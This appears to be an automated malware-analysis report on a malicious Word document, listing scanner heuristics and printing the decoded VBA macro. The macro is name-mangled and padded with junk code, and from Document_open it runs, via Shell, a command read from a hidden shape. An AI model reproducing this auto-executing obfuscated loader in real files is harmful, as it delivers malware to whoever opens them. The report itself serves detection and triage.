MALICIOUS
272
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6769506-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6769506-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
UKCnVzbdRONfKILK = Hex(wtKawEcKYLjOFRJqDDwtVr) FjiKaiGX = Array(bbcKnYF, czouPLw, oHENQ, [Interaction].Shell(jLijpEEizbT, vrAKX), FndUQW) Select Case mrXYFXJDVvVUGn -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7993 bytes |
SHA-256: 9fc609b00d16d78d52afb8496d16360fb60f2077fed2116ca3abe73ff05abbfe |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
177 of 212 identifiers look randomly generated (e.g. 'XiLoNtQsMiFtvSSsTLHVpAha') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "IiuvLaRVzrTfN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case azhonwEcoTiauqnUUauBS
Case 275678925
KFOrwJLaNUhzzAztBIjjCbhj = ChrB(190419675 / ChrB(250008113))
lKjUOkCXjZFHTdsRGMrnUVht = mFtjYhOKNZQjzSOzdQTwAMG
Case 60662133
aUlwbQdnbciInKr = 283671402
FDclHtdqrENwsZzkZzNcMlJn = 295934643
End Select
Set qjopGcFDGCjYTaIHkL = qjCfYNMdOlUupsjDt
BwkroSwDBinUEB = Hex(XBnnDQbtwqSmIrfjXOGiMfzv)
Select Case nHYUIHtzYEvJqoaoizKaoD
Case 80474127
qLuiDkLaljGIhdKiwC = ChrB(130539492 / ChrB(331009316))
lZWjICVCzBkvCizNOvo = VXJiSHFofbljNzElXzvhpXm
Case 208773788
MiwNRjHfECOQoOBzjX = 155888272
AhFaLpRAGDzldMFcG = 174463166
End Select
Set siDJuqVijujJAOPU = ZYCbSGZAFdmcIYrGJflw
KkpHhFWuzWNraChYmZX = Hex(JpMiGbVsCrjiXHOoMUlA)
Select Case QXNBTqROhSWERrpLnQzj
Case 75440538
wXlJSNavaGzIGEqjmTEjS = ChrB(102551779 / ChrB(329405134))
MZQhFBImUjaqPJXDn = rQFIllVHddbfShZWztztqZ
Case 327197175
oZdzRdwBsfXhKDni = 79678162
XiLoNtQsMiFtvSSsTLHVpAha = 255344420
End Select
Set JrLtFShsCSBAMkiYRSvwjF = RkcXqIWzkBakZhSYm
DPArTwXmQjPfoCDd = Hex(JcvqjfVQwlzJrwtImjpOaQd)
Set sniFN = Shapes("vVlIKOOjmbQjRA").TextFrame
Select Case TCNjMBShSPwwjcssOlz
Case 26554376
UuXElJIiUwiSKXpZc = ChrB(158579645 / ChrB(81420610))
jlaBVhjNrkJRYN = IpiarKCwRNdYFCSmNmDhiTVj
Case 27495905
vnkoQtzXjjzzUpinJnr = 56877973
KYwwiVfRoTvWRPOOczja = 219488446
End Select
Set joPRNCvKirvwlPmrmY = GrPCaDaQZjqIhwopJ
MHcVilEbVizclKLIaiTm = Hex(OmmVirjNzwacLZRplNizzi)
Select Case RkRzirbQSWHwwEYBHrWscO
Case 72346412
ljSPQmDwTzLPRu = ChrB(314880036 / ChrB(68391382))
aXbOYjvzYuZInODZP = CYLzfSIdwsJkNvLcB
Case 280329133
nNzXSssipjjIpCftlEbsI = 37266391
hCnojdwKMMpcBCBtGmoTwPkT = 222872207
End Select
Set CZYZwbhRSUiEMAtVXvAai = kLUFUmwSSUGwbWmnOOujkj
BanZbsoSHDLpMEsGu = Hex(ABKwNYXikjmfuGDwTi)
Select Case qJBKffiVYsPRRKf
Case 120120799
VVnKvJwIjSVKHvDvGM = ChrB(230228574 / ChrB(40841106))
BzijMXWvIWQHCniizuzFCwNJ = RzLWKwwMYTYJajma
Case 83966372
vECEIZQISjAvDkUYuZK = 166158598
YTvdTFVXKMfpaREIMpmGCjML = 192941671
End Select
Set ooCpNPnaXkHboUulH = VFdSQPhkXTvrHkADQh
VzPBzuTBlASLQYppXn = Hex(YnHcrUifdWblDMRlXG)
Select Case clMPrwVuCGhtfiBSiUbRh
Case 228607912
tvUtFJzTEDELETbiaNR = ChrB(232948096 / ChrB(221033844))
sZXSIRfJvCuMSUXEPkFmcpaW = zDpADQzrwCvVnBfouICRrAGH
Case 143888453
jiuSCwBVJOpJrmuUURbjcjZw = 224932875
YEFwwiiFkVzfzzTRrRzlR = 103958260
End Select
Set XjpfmWwEwkVZwQLRGi = CZXoSiPKsHzwPIiiRHCsjn
BvdXXAfAsGfNzzsXB = Hex(LEzwnGQOiuKDmCOJWs)
jLijpEEizbT = sniFN.TextRange.Text + WXhVOp + wNwjFH + RvcPuJ + POwwn + TKzbZLt + wMMbwV + kXBjW + GilTq + fzMJFwh
Select Case mMkHqcaVwVZWZqZlToaj
Case 32633953
hYOWuajwirwtIOji = ChrB(208668558 / ChrB(88542475))
rYpHacUiPnlnhZafLt = iAlzniafhKEkINLNns
Case 116106184
uZvUJwDPUiiUpMiWFYCYAw = 257645422
KDdaVLnnuFZJERqqiL = 75790287
End Select
Set bjvwipIOpsnzlbJFTdtIuvak = USniLuplnsbHjrjDZzBRcX
IkWBRDFjILKNWVfdwzMw = Hex(iwmlMFVzZSKzoizpsXiiL)
Select Case jNMCJMQcDpPEURpXd
Case 299161030
ltrBtSfrMAzJrAQcBcN = ChrB(19360414 / ChrB(59813600))
sVInjoMpCvrnjWsM = kiVEcDfXEDonvQqQZ
Case 5707373
sGlrfWwESETtjpJdYn = 54106878
ScQckXBGfBXHWWTMw = 257126558
End Select
Set hdzNSkJEwlmRcQkDQpJGIU = YQjMXMVwilwanTOzraSCUsj
qlTCWojhMmazlYmrdpHfdqw = Hex(CsSfpSWfhlVltTaqFRNBs)
Select Case wJSwUEaSlwBLPocPRT
Case 192917291
XttPzWJcCYzmfhD = ChrB(272878272 / ChrB(285705846))
zVmJJsjVjDmcZczPz = PCzzvzQNzOjikm
Case 160152315
VHSOjAjbnFqZzXmPkAZoSAZo = 296032756
tUpBSzEaGszjTPVXKqHqOcbR = 330248202
End Select
Set NjjVhdVnHMmlnqVYQuRAj = SvpjhCiRsXDimUul
UOjHJkYCQVpLhzzD = Hex(QkfzvTFqTOiEEA)
Select Case dSkzciEWMbrLfzt
Case 248780737
WKkTHCaIFNtEsmm = ChrB(147600130 / ChrB(233991543))
HtSuhzuvbjQzXFIPYta = WQJpXULRUoEovWlrqbdnZL
Case 178554002
rHpnvdNsvzFrkdXMlcbmbbC = 12268292
RZzQmMKpPzQiXVqaMt = 330968999
End Select
Set uHNEQBwkoSQFoUiEQ = IlvCVfGhOGkLPiDlYJM
zkPZAwhKqCrmKkkNVslhzjn = Hex(zdCiBCvUsXcYVVBYwvqMPwA)
Select Case oKuuYXzYuWPwAqZfL
Case 319660477
vFMikOpUiwOzzMXbmThnD = ChrB(335370618 / ChrB(144784617))
IjoBPTYCaACJcbJfjCOcf = RldPmMdJiwjcaBanEP
Case 154424471
YzJNwKJCDAktElRC = 162295430
jMYRRGaABHEvzw = 34165099
End Select
Set wUcPQcDbFiMqYpkYOE = LnHfDnwJBzHCloknzaIkD
zLjukcLXjhtPtfq = Hex(YcRTCdzfaBnCnzFUfCqvvJ)
Const vrAKX = 0
Select Case uwWhrpUhntizkk
Case 22548405
BPlGXPhIrhOaGEFmC = ChrB(151482028 / ChrB(278514111))
TNBZFNhfdYmUESDPKSifOOq = btbjnvwNuIwoOMBJ
Case 217410483
iSvtWnApcksKjF = 149915821
zLmwrhbZZvWPBwQVwLjXPi = 150184725
End Select
Set jwTMUjcrRXOpXiLwrVUbRk = dTXMUVzbPowOsOPEpSfzij
zPAnjtNvWwLpszXIVSw = Hex(BYTSibRiJlmJttZwTiThBtcQ)
Select Case SHrEfdYisUWjSoS
Case 189731185
wwzQYnIEamfXZDKkIiAEzFf = ChrB(212052593 / ChrB(193214441))
iFaITBXIohOptUjzF = sKTRLvJKRYsrQTmFICiRTdz
Case 108322425
dVSkjVAAonSzMufw = 62151140
zQzQvDoLjVnXPKCDiZqZl = 20747449
End Select
Set rbjTGwIwSJuAAQMaPwUpfMR = IwIMFHjzwXFoPjhPXWV
UKCnVzbdRONfKILK = Hex(wtKawEcKYLjOFRJqDDwtVr)
FjiKaiGX = Array(bbcKnYF, czouPLw, oHENQ, [Interaction].Shell(jLijpEEizbT, vrAKX), FndUQW)
Select Case mrXYFXJDVvVUGn
Case 217701036
mdIfQATYLJjodERA = ChrB(99164205 / ChrB(221415947))
zjdwWSlFjXitETW = FLzmmXzMvrUZQiUFYfjhI
Case 201539321
MfunAdPbUGULpRvVajRDiz = 76895777
BCdVYkpbbZkHsjzjfPATwT = 209128545
End Select
Set dKJArbHOTFlzzuDkRskPhn = qhhXOzssiWqrNapkzSV
nwBjlMPBDjQFpiTSJDsRaM = Hex(aJDpJcHkzLzorj)
Select Case fbSsznqLlfkQij
Case 132924690
EpGCjMDSPKumDjijnNKI = ChrB(110832803 / ChrB(201684112))
jhpYWVQKonJIHwU = TYAdosDIEBDcQYLMZka
Case 137023389
njzzAGztXXiSprkQBQnihUV = 118120736
tQbzjWXAhfrDdomDOjdVJb = 213434617
End Select
Set vYUnqJTKfLGpYwoBKSI = sNXbAaSnswiRkABL
kJYMhXShzfSscK = Hex(TUiiAsnQqfSijoEXvdwaJkz)
Select Case ZLVrdvkLwWCwjVSqzwXILBqi
Case 341363923
ndiifcoKjLUpqLwwt = ChrB(215212664 / ChrB(218352198))
oLohIvBMkYUmsKIGcTqZKZ = HVKGLKPHJBMibpBVkacZKr
Case 220763287
fDrTaqHdOYhLwppCVRKlfjjR = 180975825
FzhAbQoNbISvhTtjPCIpWvkZ = 27631994
End Select
Set jvRwWasbkIvOzQXlOhjZjqr = RdIlbKOHvhjsvcmsDFjlnAFr
lhDpiJqEVjsRGzZtn = Hex(PhiplvrWiGGIQXRTq)
Select Case QZYwOHihHfujCT
Case 58937384
JqMfYbKwNIijwVzjGGhjHnj = ChrB(37312444 / ChrB(222894983))
sHOQjBszizCJdpPbjFcBil = OZwmZlWGHzliChwcdozrw
Case 199746092
drTfEdcjEGZArkPSOIsuMrHM = 303175502
dzNjujjcTvFFSciRhbchFr = 92820220
End Select
Set kjFjklkHlRAdSVMpQO = TMIpPQuKfjMhllrwK
AshKwUBcBwLOnQrauIct = Hex(TpaFXYjOraWBLQWjJOnonP)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.